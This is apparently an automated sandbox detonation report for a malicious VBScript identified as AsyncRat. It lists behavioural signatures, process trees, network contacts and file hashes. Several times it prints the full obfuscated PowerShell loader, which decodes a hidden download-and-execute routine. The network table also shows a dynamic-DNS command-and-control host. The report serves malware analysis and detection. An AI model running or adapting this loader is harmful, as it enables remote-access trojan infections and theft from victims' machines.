Analysis Overview
SHA256
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
Threat Level: Known bad
The file 255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Checks computer location settings
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-24 13:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-24 13:15
Reported
2024-05-24 13:17
Platform
win7-20240508-en
Max time kernel
143s
Max time network
145s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2820 set thread context of 2300 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n4.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n4.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n4.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n4.sendspace.com | tcp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
Files
memory/1976-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
memory/1976-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/1976-6-0x0000000001C80000-0x0000000001C88000-memory.dmp
memory/1976-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab563D.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar5640.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQ18KB3ITWJJSPMTJK0U.temp
| MD5 | 31e946d92f43dac050f1142afdb612f2 |
| SHA1 | bc97c240fd9a57fac638e4992e1b097b1834f20f |
| SHA256 | bad1c8e64108f46e9000247fc338f5e01310338d6107bbd4bc1cd9a80dcb0e74 |
| SHA512 | 4552b752c8d562ab7dcfd13818508053fded8e87fa7046b0bb1ac3455ab78e38c5587751a27353829aa137a8acfdb09df13dae9a7e689f75c8df29052e095399 |
C:\Users\Admin\AppData\Roaming\Absterge.Pig
| MD5 | ce1f757dad7e08f32964a255a380674e |
| SHA1 | 19e38ec002272355856d0f68324c0b18a7a07dc0 |
| SHA256 | 4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548 |
| SHA512 | ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e |
memory/1976-54-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2820-55-0x0000000006580000-0x00000000074A9000-memory.dmp
memory/1976-56-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2299a6fb34550e1d3e6dd69f6fb5cbfb |
| SHA1 | 082eb4da1816d3a20d7bead043b7367b9dfcdf24 |
| SHA256 | 2d550eb29bb22df74cc499d69f71653a96b26d091276472a24023f4f2d42eb01 |
| SHA512 | 12cedad6552f192b93e81b4cb0e53b9db554be8bb3f4c209a25be50e91160a5b532bc72c6965dc49afa4ac756ae00562612a7626f30becd2c06573118666c8c0 |
memory/2300-83-0x00000000006D0000-0x0000000001732000-memory.dmp
memory/2300-84-0x00000000006D0000-0x0000000001732000-memory.dmp
memory/1976-85-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2300-86-0x00000000006D0000-0x00000000006E6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-24 13:15
Reported
2024-05-24 13:17
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4156 set thread context of 2608 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr 